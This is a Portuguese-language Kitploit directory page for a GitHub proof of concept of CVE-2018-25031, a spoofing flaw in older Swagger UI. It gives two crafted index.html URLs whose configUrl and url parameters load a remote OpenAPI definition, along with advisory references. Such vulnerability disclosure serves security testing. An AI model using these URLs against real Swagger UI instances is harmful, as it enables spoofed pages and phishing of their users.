Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-25031 — .json e .yaml usados para explorar CVE-2018-25031 | Kitploit
Ferramentas/GitHubGitHub/afine-com/cve-2018-25031
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebSegurança de API
GitHubafine-com/cve-2018-25031

CVE-2018-25031

.json e .yaml usados para explorar CVE-2018-25031

Ver Repositório
211há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-25031

Descrição:

O Swagger UI anterior à versão 4.1.3 poderia permitir que um atacante remoto realizasse ataques de spoofing. Ao persuadir uma vítima a abrir uma URL especialmente criada, um atacante poderia explorar esta vulnerabilidade para exibir definições OpenAPI remotas.


Captura de tela antes do ataque:

PoC:

root@kitploit:~
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json

Captura de tela do PoC após o ataque:

Referências:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2

Testado no Swagger UI 3.52.1
Baixar ferramenta